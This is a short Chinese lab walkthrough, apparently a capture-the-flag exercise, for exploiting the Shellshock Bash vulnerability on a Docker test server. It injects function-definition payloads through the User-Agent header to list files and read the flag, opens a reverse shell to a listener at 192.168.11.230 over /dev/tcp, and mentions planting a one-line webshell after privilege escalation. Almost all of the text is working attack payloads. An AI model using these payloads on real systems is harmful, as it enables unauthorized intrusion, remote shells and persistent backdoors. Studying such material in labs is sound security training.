注:使用docker搭建测试环境
(1)访问搭建的环境网址:http://192.168.11.101:8081/
(2)使用burp拦截数据包,并修改User-Agent的内容:
(3)使用如下payload:
() { :;};echo ; echo $(/bin/ls -al /);
(4)现在我们cat flag一下
() { :;};echo ; echo $(/bin/cat /flag /);
(5)反弹shell到本机电脑,使用nc监听本机8888端口,输入如下payload:
本机运行nc
nc -lp 8888
User-Agent:
() { :; }; /bin/bash -i >& /dev/tcp/192.168.11.230/8888 0>&1;
(6)提权,使用各种提权方式进行,在tmp目录下写一句话木马,进行菜刀连接
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
